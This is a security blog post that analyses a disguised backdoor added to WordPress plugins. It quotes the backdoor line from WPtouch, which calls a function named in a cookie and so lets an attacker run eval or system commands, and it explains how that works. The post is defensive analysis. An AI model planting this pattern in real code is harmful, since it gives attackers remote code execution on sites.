The Latest in IT Security

WordPress plugins hacked – Understanding the backdoor


If you haven’t heard about it already, yesterday three popular WordPress plugins (AddThis, WPtouch, and W3 Total Cache) had a malicious backdoor added to them via the plugin repository. That lead to resetting all passwords as a precaution. You can read about it here: Passwords Reset. I must note that the team did a amazing job dealing with this incident and getting it all fixed very fast!

However, what is interesting to us is what the team said:

Earlier today the WordPress team noticed suspicious commits to several popular plugins (AddThis, WPtouch, and W3 Total Cache) containing cleverly disguised backdoors.

Cleverly disguised backdoors? That’s something we wanted to check. We went to their repositories and found this in the WPtouch changelog:

 if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))  
                $this->desired_view = $matches[1]&#46$matches[2]; 

What does this code do

Someone skimming through the code may not see anything with malicious intent there. However, it checks if a specific COOKIE is set, and if it is, it parses the content into the $matches variable. After that, it executes the code by calling ($matches[1]($matches[2])) ). That is possible because variable names can be called as functions in PHP (so matches1 is the name, and matches2 the argument of the function).

So someone could set the cookie to eval, or even system/exec, and run any command on the target site as the web server user.

Kudos to the WordPress Core Team

Again, very clever backdoor and I am impressed that the WordPress team caught this in the middle of so many plugins and commits. I wasn’t able to check the other plugins, because it seems that is down at the moment.

Another thing to highlight, which Matt stated in the news release on, is make sure you update your plugins. By making sure your software is up to date, you have the latest patches and security fixes which in turn lowers your risk of security issues.

If you are worried your site might have been hacked, try scanning it with Sucuri SiteCheck to see if there is anything wrong.

Leave a reply


FRIDAY, JULY 01, 2022

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...



Latest Comments